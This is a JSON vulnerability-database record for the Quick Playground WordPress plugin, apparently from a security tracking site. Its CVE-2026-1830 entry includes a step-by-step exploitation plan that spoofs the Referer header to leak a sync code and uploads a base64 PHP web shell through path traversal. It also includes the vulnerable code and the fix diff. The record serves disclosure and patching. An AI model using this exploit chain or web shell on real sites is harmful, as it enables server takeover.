[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fFuRnweF6HA2ajMrFntX8neUAb5RAOsexBso_8L5HQUo":3,"$flYOU6C7si-d3H3vx6R7kIBj9pLDRFtfykjXRsp0lIc0":647},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":11,"num_ratings":11,"last_updated":13,"tested_up_to":14,"requires_at_least":15,"requires_php":16,"tags":17,"homepage":22,"download_link":23,"security_score":24,"vuln_count":25,"unpatched_count":11,"last_vuln_date":26,"fetched_at":27,"vulnerabilities":28,"developer":69,"crawl_stats":34,"alternatives":76,"analysis":172,"fingerprints":619},"quick-playground","Quick Playground","1.3.2","davidfcarr","https:\u002F\u002Fprofiles.wordpress.org\u002Fdavidfcarr\u002F","\u003Cp>The Quick Playground plugin provides a safe and convenient way to test new designs and features for your WordPress website, or to create demos and share proposed design changes. It creates a clone of your website’s home page and key content, allowing you to experiment with plugins, themes, and design changes without affecting your live website.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F2nrRLy6bXZk?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>The plugin takes advantage of WordPress Playground, the innovative software that simulates a complete PHP\u002FWordPress\u002Fdatabase server environment running in your web browser for testing and experimentation. 
Quick Playground simplifies the creation of Playground Blueprints, which define steps such as installing themes and plugins and loading content. No need to hand-code JSON or arrange for code to be served from Github.\u003C\u002Fp>\n\u003Cp>This plugin is ideal for developers and designers who want to test new ideas without disrupting their live website.\u003C\u002Fp>\n\u003Cp>Features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Clone your website’s home page and key content for testing purposes. For performance reasons, the plugin does not attempt to clone your entire database.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Experiment with themes and plugins, including unpublished custom code.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Test new block theme design customizations in a WordPress Playground environment before implementing them on your live site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Save changes for future playground sessions, allowing you to keep experimenting.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Create demo environments separate from your live website content, for example to showcase themes, plugins, or hosting services.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Sync changes back to your live website. For example, you can prototype block theme changes in Playground and copy the updated templates or template parts back to the live site.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Define pop-up prompts \u002F help tips to be displayed on any front end or admin page within the playground environment.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Works on WordPress multisite (clones the individual site, not the whole network). The multisite network administrator can set default themes and plugins to include or exclude.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Note: some of these features were previously reserved for a “Pro” version but are now available for free. 
You’re welcome.\u003C\u002Fp>\n\u003Cp>Learn more at \u003Ca href=\"https:\u002F\u002Fquickplayground.com\" rel=\"nofollow ugc\">quickplayground.com\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Developer Friendly Features\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fdavidfcarr\u002Fquick-playground\" rel=\"nofollow ugc\">Source code on GitHub\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fdavidfcarr\u002Fquick-playground\u002Fblob\u002Fmain\u002Ffilters.php\" rel=\"nofollow ugc\">Examples of Using the Filters and Actions\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>How it Works\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>You can create multiple Playground profiles, each of which can specify different themes, plugins, playgrounds, content, and settings. The Playground Blueprint is created for you, stored on your server as a PHP associative array, and served to the Playground as a JSON file with the same data hierarchy.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>When a Playground is launched, it loads the themes, plugins, and content specified in your Blueprint. Any custom themes and plugins not in the WordPress repository will be archived on your server as ZIP files and downloaded on demand.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Quick Playground loads a copy of itself into the Playground environment and assists with copying over content.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>If you obtain a Pro license key, a plugin with additional capabilities for saving and syncing content will be loaded into the Playground (not your live website).\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>This plugin is licensed under the GPLv2 or later. 
See the \u003Ca href=\"https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-2.0.html\" rel=\"nofollow ugc\">GNU General Public License\u003C\u002Fa> for more details.\u003C\u002Fp>\n\u003Ch3>External services\u003C\u002Fh3>\n\u003Cp>Users may configure Quick Playground to display content from other websites that also run Quick Playground.\u003C\u002Fp>\n","Simplify creation of WordPress Playground test, staging, and demo sites. Specify the theme, plugins and content from the WP admin dashboard.",0,778,"2026-04-07T14:32:00.000Z","6.9.4","6.2","",[18,19,20,21],"demo","playground","staging","testing","https:\u002F\u002Fquickplayground.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquick-playground.1.3.2.zip",94,1,"2026-04-08 14:35:08","2026-04-16T10:56:18.058Z",[29],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":6,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":26,"updated_date":40,"references":41,"days_to_patch":25,"patch_diff_files":43,"patch_trac_url":34,"research_status":52,"research_verified":53,"research_rounds_completed":54,"research_plan":55,"research_summary":56,"research_vulnerable_code":57,"research_fix_diff":58,"research_exploit_outline":59,"research_model_used":60,"research_started_at":61,"research_completed_at":62,"research_error":34,"poc_status":63,"poc_video_id":34,"poc_summary":16,"poc_steps":64,"poc_tested_at":65,"poc_wp_version":66,"poc_php_version":67,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":53,"poc_model_used":68,"poc_verification_depth":34},"CVE-2026-1830","quick-playground-missing-authorization-to-unauthenticated-arbitrary-file-upload","Quick Playground \u003C= 1.3.1 - Missing Authorization to Unauthenticated Arbitrary File Upload","The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. 
This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server.",null,"\u003C=1.3.1","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-04-09 03:25:57",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=api-prod",[44,45,46,47,48,49,50,51],"client-demo-filters.php","client-qckply_data.php","client-save-images.php","client-save-playground.php","expro-api.php","expro-filters.php","expro-quickplayground-sync.php","quick-playground.php","researched",false,3,"# Exploitation Research Plan: Quick Playground \u003C= 1.3.1 Arbitrary File Upload (RCE)\n\n## 1. Vulnerability Summary\nThe **Quick Playground** plugin for WordPress is vulnerable to unauthenticated Remote Code Execution (RCE) via arbitrary file upload in versions up to and including 1.3.1. The vulnerability stems from two issues:\n1. **Information Leak**: REST API endpoints (like `save_settings` or `download_json`) have insufficient authorization checks (e.g., only checking the `Referer` header), allowing unauthenticated attackers to retrieve the `sync_code` required for authenticated operations.\n2. **Arbitrary File Upload with Path Traversal**: The `upload_image` REST API endpoint fails to properly sanitize the `filename` parameter and lacks sufficient authorization. This allows an attacker to upload PHP files and use path traversal (`..\u002F`) to place them in accessible directories.\n\n## 2. 
Attack Vector Analysis\n- **Endpoints**: \n    - Information Leak: `GET \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault` or `GET \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fdownload_json\u002Fdefault`.\n    - File Upload: `POST \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault`.\n- **Method**: REST API.\n- **Authentication**: Unauthenticated (authorization bypass via `Referer` spoofing or insufficient checking).\n- **Payload**: JSON body containing a base64 encoded PHP shell and a traversed filename.\n- **Preconditions**: The plugin must be active. A \"profile\" (usually `default`) must exist (created upon plugin activation).\n\n## 3. Code Flow\n1. **Registration**: The plugin registers REST routes in `expro-api.php`.\n2. **Leakage Path**:\n   - `Quick_Playground_Save_Settings::register_routes` (or similar) registers a `GET` method for `save_settings\u002F(?P\u003Cprofile>[a-z0-9_]+)`.\n   - The `permission_callback` likely mimics `Quick_Playground_Sync_Ids::get_items_permissions_check`, which only verifies: `return 'https:\u002F\u002Fplayground.wordpress.net\u002F' == $_SERVER['HTTP_REFERER'];`.\n   - If accessed via `GET`, the callback `get_items` reads the JSON settings file from the uploads directory and returns it.\n   - This JSON contains the `qckply_sync_code` (as seen in `client-save-playground.php` where `$clone['sync_code'] = $qckply_sync_code` is added to the outgoing JSON).\n3. **Upload Path**:\n   - The `upload_image` endpoint is called.\n   - The handler receives `sync_code`, `base64`, and `filename`.\n   - It validates `sync_code` using `qckply_cloning_code($profile)`.\n   - Once authorized, it writes the decoded `base64` content to a path constructed using `filename`.\n   - Because `filename` is not sanitized for path traversal, `..\u002F..\u002Fshell.php` allows writing outside the intended directory.\n\n## 4. 
Nonce Acquisition Strategy\nThis vulnerability **does not require a WordPress nonce**. The REST API endpoints are designed for machine-to-machine communication between a WordPress Playground instance and the host site. Authorization is handled via:\n1. The `Referer` header (for the information leak).\n2. The `sync_code` parameter in the JSON body (for the file upload).\n\n## 5. Exploitation Strategy\n### Step 1: Retrieve the Sync Code\nSpoof the `Referer` header to trick the permission check and retrieve the configuration file for the `default` profile.\n\n- **Request**:\n  - **Tool**: `http_request`\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault`\n  - **Method**: `GET`\n  - **Headers**:\n    - `Referer: https:\u002F\u002Fplayground.wordpress.net\u002F`\n- **Expected Response**: A JSON object containing `\"qckply_sync_code\": \"STATED_CODE\"` or similar keys inside the `settings` object.\n\n### Step 2: Upload the PHP Web Shell\nUse the retrieved `sync_code` to authorize a file upload to the `upload_image` endpoint. 
Use path traversal to place the shell in the `\u002Fwp-content\u002F` directory.\n\n- **Request**:\n  - **Tool**: `http_request`\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault`\n  - **Method**: `POST`\n  - **Headers**:\n    - `Content-Type: application\u002Fjson`\n    - `Referer: https:\u002F\u002Fplayground.wordpress.net\u002F`\n  - **Body**:\n    ```json\n    {\n      \"sync_code\": \"RETRIEVED_SYNC_CODE\",\n      \"filename\": \"..\u002F..\u002Fpwn.php\",\n      \"base64\": \"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\"\n    }\n    ```\n    *(Note: `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+` is `\u003C?php system($_GET['cmd']); ?>`)*\n\n### Step 3: Trigger Execution\n- **Request**:\n  - **URL**: `http:\u002F\u002Fvulnerable-site.local\u002Fwp-content\u002Fpwn.php?cmd=whoami`\n  - **Method**: `GET`\n\n## 6. Test Data Setup\n1. **Activate Plugin**: Ensure `quick-playground` is active.\n2. **Initialize Settings**: Visit the plugin settings page once as an admin to ensure the `default` profile and `qckply_sync_code` are generated and saved to the filesystem.\n   - CLI: `wp plugin activate quick-playground`\n   - CLI: `wp eval \"qckply_get_directories(); qckply_cloning_code('default');\"` (Forces creation of directories and options).\n\n## 7. Expected","The Quick Playground plugin for WordPress is vulnerable to unauthenticated Remote Code Execution (RCE) due to a combination of an information leak and an insecure file upload endpoint. 
Attackers can spoof a Referer header to retrieve a synchronization code and subsequently use that code to upload arbitrary PHP files via a path traversal vulnerability in the REST API.","\u002F\u002F expro-api.php ~line 178\npublic function get_items_permissions_check($request) {\n    return 'https:\u002F\u002Fplayground.wordpress.net\u002F' == $_SERVER['HTTP_REFERER'];\n}\n\n---\n\n\u002F\u002F expro-api.php ~line 536\npublic function get_items($request) {\n    \u002F\u002F ... (truncated)\n    $params = $request->get_json_params();\n    $filename = sanitize_text_field($params['filename']);\n    \u002F\u002F ... (truncated)\n    $filedata = base64_decode($params['base64']);\n    $bytes_written = file_put_contents($qckply_site_uploads.'\u002F'.$filename,$filedata);\n    \u002F\u002F ...","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.1\u002Fexpro-api.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.2\u002Fexpro-api.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.1\u002Fexpro-api.php\t2026-02-07 00:44:34.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fquick-playground\u002F1.3.2\u002Fexpro-api.php\t2026-04-07 14:32:44.000000000 +0000\n@@ -536,10 +478,7 @@\n     $qckply_site_uploads_url = $qckply_directories['site_uploads_url'];\n     $params = $request->get_json_params();\n-    $filename = sanitize_text_field($params['filename']);\n+    $filename = empty($params['filename']) ? 
'' : sanitize_file_name(wp_basename($params['filename']));\n     $last_image = get_transient('qckply_last_image_uploaded');\n     if($last_image == $filename) {\n         $sync_response['message'] = 'duplicate image';\n@@ -556,10 +496,41 @@\n         return $response;\n     }\n     else {\n+      $filedata = base64_decode($params['base64'], true);\n+      $image_info = false;\n+\n+      if(false !== $filedata) {\n+        $image_info = @getimagesizefromstring($filedata);\n+      }\n+\n+      $allowed_mimes = apply_filters('qckply_allowed_upload_mimes', [\n+        'image\u002Fjpeg' => 'jpg',\n+        'image\u002Fpng' => 'png',\n+        'image\u002Fgif' => 'gif',\n+        'image\u002Fwebp' => 'webp',\n+      ]);\n+\n+      if(false === $filedata || empty($image_info['mime']) || empty($allowed_mimes[$image_info['mime']])) {\n+        $sync_response['message'] = 'invalid file type';\n+        return new WP_REST_Response($sync_response, 400);\n+      }","1. Retrieve Sync Code: Send a GET request to \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fsave_settings\u002Fdefault. Spoof the 'Referer' header to 'https:\u002F\u002Fplayground.wordpress.net\u002F' to bypass the permission check. Extract 'qckply_sync_code' from the JSON response.\n2. Prepare Payload: Create a base64-encoded string of a PHP web shell.\n3. Execute Arbitrary File Upload: Send a POST request to \u002Fwp-json\u002Fquickplayground\u002Fv1\u002Fupload_image\u002Fdefault. In the JSON body, include the retrieved 'sync_code', the base64-encoded payload, and a 'filename' parameter using path traversal (e.g., '..\u002F..\u002Fpwn.php') to escape the restricted uploads directory.\n4. 
Remote Code Execution: Access the uploaded file at the calculated path (e.g., \u002Fwp-content\u002Fpwn.php) to execute arbitrary PHP commands.","gemini-3-flash-preview","2026-04-16 16:26:25","2026-04-16 16:27:14","failed",[],"2026-04-17 19:16:23","6.7","8.3","claude-opus-4-7",{"slug":7,"display_name":7,"profile_url":8,"plugin_count":70,"total_installs":71,"avg_security_score":72,"avg_patch_time_days":73,"trust_score":74,"computed_at":75},11,490,88,499,71,"2026-04-18T19:25:55.793Z",[77,95,113,132,148],{"slug":78,"name":79,"version":80,"author":81,"author_profile":82,"description":83,"short_description":84,"active_installs":11,"downloaded":85,"rating":86,"num_ratings":25,"last_updated":87,"tested_up_to":14,"requires_at_least":88,"requires_php":89,"tags":90,"homepage":93,"download_link":94,"security_score":86,"vuln_count":11,"unpatched_count":11,"last_vuln_date":34,"fetched_at":27},"demo-reset","Demo Reset – Robust Demo Website Automation","2.0.1","Anjana Hemachandra","https:\u002F\u002Fprofiles.wordpress.org\u002Fanjanahema\u002F","\u003Cblockquote>\n\u003Cp>\u003Cstrong>Build it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Freeze it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Let them play with it \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> Let it to Auto Reset via Server Cron.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>A lightweight plugin built to deliver robust, set-and-forget Demo Automation.\u003C\u002Fp>\n\u003Ch3>Philosophy\u003C\u002Fh3>\n\u003Cp>Your WordPress product can be a Theme, Plugin, or Specially Developed Website. Why limit your customers to frontend-only demos? With Demo Reset Free plugin, they can experience it as an Editor, Author, Subscriber, or any user—without risking permanent changes or security. 
This is the ultimate set-and-forget automation solution for Demo Websites.\u003C\u002Fp>\n\u003Cp>Stay ahead of your competitors by earning your customers’ trust and confidence with fully accessible Demo Websites on your own servers.\u003C\u002Fp>\n\u003Cp>At Ministry of Plugins we believe it is our duty to develop WordPress technologies to double your sales.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>EXPLORE THE LIVE DEMO: \u003Ca href=\"https:\u002F\u002Ffree-plugin-demo.demoresetpro.com\u002F\" rel=\"nofollow ugc\">Demo Website link…\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>Concept\u003C\u002Fh3>\n\u003Cp>Simply install the Demo Reset free plugin or Demo Reset Pro plugin on your WordPress website and create a Reset Point to put the site in the Frozen State (Demo Mode). This allows you to let your customers interact with the website without any risk of permanent changes. With each automatic or manual reset, all customer changes will be removed, restoring the website to its original state. In short, your website is now ready for Demo purposes.\u003C\u002Fp>\n\u003Cp>See the Concept Diagram: \u003Ca href=\"https:\u002F\u002Fps.w.org\u002Fdemo-reset\u002Fassets\u002Fscreenshot-1.png\" rel=\"nofollow ugc\">Image link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Use Cases of Demo Reset plugin\u003C\u002Fh3>\n\u003Ch4>Demo for sales purposes:\u003C\u002Fh4>\n\u003Cp>Having a Demo Website as part of your sales funnel can significantly boost customer conversions for website developers, theme developers, and plugin developers. It allows potential customers to experience the product firsthand, increasing their confidence in making a purchase. 
With each manual or automatic reset cycle, the Demo Reset plugin will keep the WordPress website in its original state by removing all temporary changes made by customers.\u003C\u002Fp>\n\u003Ch4>Demo for presentation purposes:\u003C\u002Fh4>\n\u003Cp>For website developers, converting a newly developed WordPress website into a Demo Site is an excellent strategy for presenting its features and functions to stakeholders. After the presentation, the developer can easily reset the website to its original state, erasing any temporary changes. This ensures that the website remains clean and professional. The Demo Reset plugin can be turned off once the presentation is complete.\u003C\u002Fp>\n\u003Ch4>Demo for training purposes:\u003C\u002Fh4>\n\u003Cp>Training the staff and stakeholders on a newly developed WordPress website is more effective when using the website in Demo state. This approach allows trainees to interact with the website and explore its features without the risk of making permanent changes. After the training session, the developer can reset the website to its original state, removing any temporary modifications. This method ensures the site remains pristine and always ready for future use. 
The Demo Reset plugin can be turned off as needed.\u003C\u002Fp>\n\u003Cp>See the Use Cases Diagram: \u003Ca href=\"https:\u002F\u002Fps.w.org\u002Fdemo-reset\u002Fassets\u002Fscreenshot-2.png\" rel=\"nofollow ugc\">Image link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Reset Free Plugin\u003C\u002Fh3>\n\u003Ch4>Demo Reset Free Plugin – Quick Introduction\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Fc4Oml--aRwY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Fc4Oml--aRwY?si=eTOn6esPHbyJsjQH\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Features of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Able to create multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Manual Demo Reset execution capability.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a regular URL.\u003C\u002Fli>\n\u003Cli>Demo Reset Cycle automation via a RESTful URL.\u003C\u002Fli>\n\u003Cli>The entire Database will reset to the chosen Reset Point.\u003C\u002Fli>\n\u003Cli>All logged-in users will be logged out during the Reset process.\u003C\u002Fli>\n\u003Cli>Displays the Demo Reset Status (THAWED state or FROZEN state) on the WP Admin Bar.\u003C\u002Fli>\n\u003Cli>Media files uploading and deleting is restricted in the FROZEN state. 
(Images, PDFs etc.)\u003C\u002Fli>\n\u003Cli>Plugins, Themes are WP Core auto updates are restricted, but can update manually in the THAWED state.\u003C\u002Fli>\n\u003Cli>Capable of deploying Demo Websites only for Non-admin users. Because all admins can deactivate the Demo Reset plugin or delete Reset Points.\u003C\u002Fli>\n\u003Cli>Displays the Demo Users’ login details, Live Demo status, and Reset Timer on the Info Bar.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>THAWED state of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Changes made by admins or other users will remain on the website.\u003C\u002Fli>\n\u003Cli>Permalink Settings page is accessible.\u003C\u002Fli>\n\u003Cli>All the auto-updates are suspended.\u003C\u002Fli>\n\u003Cli>Admins can install WP Core, Plugin & Theme updates.\u003C\u002Fli>\n\u003Cli>Admins can install or delete Plugins & Themes.\u003C\u002Fli>\n\u003Cli>Admins and users can upload new images or files.\u003C\u002Fli>\n\u003Cli>Admins and users can delete\u002Ftrash existing uploaded images or files.\u003C\u002Fli>\n\u003Cli>Only admins can access the Demo Reset Admin Menu.\u003C\u002Fli>\n\u003Cli>Only admins can change Demo Reset settings.\u003C\u002Fli>\n\u003Cli>Admins must add at least one Reset Point to activate the FROZEN state (Demo Mode).\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>FROZEN state of Free Plugin:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Changes made by admins or other users will be reset in every Reset Cycle.\u003C\u002Fli>\n\u003Cli>Permalink Settings page is restricted.\u003C\u002Fli>\n\u003Cli>All the auto-updates are suspended.\u003C\u002Fli>\n\u003Cli>Installation of WP Core, Plugin & Theme updates is suspended.\u003C\u002Fli>\n\u003Cli>Installation, activation, deactivation or deletion of Plugins & Themes are suspended.\u003C\u002Fli>\n\u003Cli>New images or files uploading is suspended.\u003C\u002Fli>\n\u003Cli>Deletion of already existing uploaded images or files is 
suspended.\u003C\u002Fli>\n\u003Cli>Logged-in users will automatically be logged out during the reset process.\u003C\u002Fli>\n\u003Cli>Only admins can access the Demo Reset Admin Menu.\u003C\u002Fli>\n\u003Cli>Only admins can change Demo Reset settings.\u003C\u002Fli>\n\u003Cli>Admins can add multiple Reset Points.\u003C\u002Fli>\n\u003Cli>Admins should delete all Reset Points to get back to the THAWED state.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Setting a WordPress website to FROZEN state (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FQ-ES0ey_0kg?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FQ-ES0ey_0kg?si=bP2tWv1m_OCVa654\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting an Active Reset Point for Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Frbw3ffD7jOM?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Frbw3ffD7jOM?si=V8se27ZzqLPqqfk5\" rel=\"nofollow 
ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting Reset Runner URL to run Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FS4qRo6vgyAY?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FS4qRo6vgyAY?si=QNq6TKHmyjYn54Kk\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting Reset Runner REST URL to run Auto Reset (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FGIJi1zxjGMU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002FGIJi1zxjGMU?si=5cdp3el-QTREWKrK\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Setting a WordPress website back to THAWED state (Valid for Free & Pro)\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" 
src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Ftq7wX74X2-s?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fyoutu.be\u002Ftq7wX74X2-s?si=yjEEqCpqG-Sm9xQG\" rel=\"nofollow ugc\">YouTube video link…\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Demo Reset Documentation: \u003Ca href=\"https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\" rel=\"nofollow ugc\">https:\u002F\u002Fministryofplugins.com\u002Fdemo-reset-docs\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Reset Pro Plugin\u003C\u002Fh3>\n\u003Ch4>Demo Reset Pro – Quick Introduction\u003C\u002Fh4>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FoicwILzz0Yo?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" 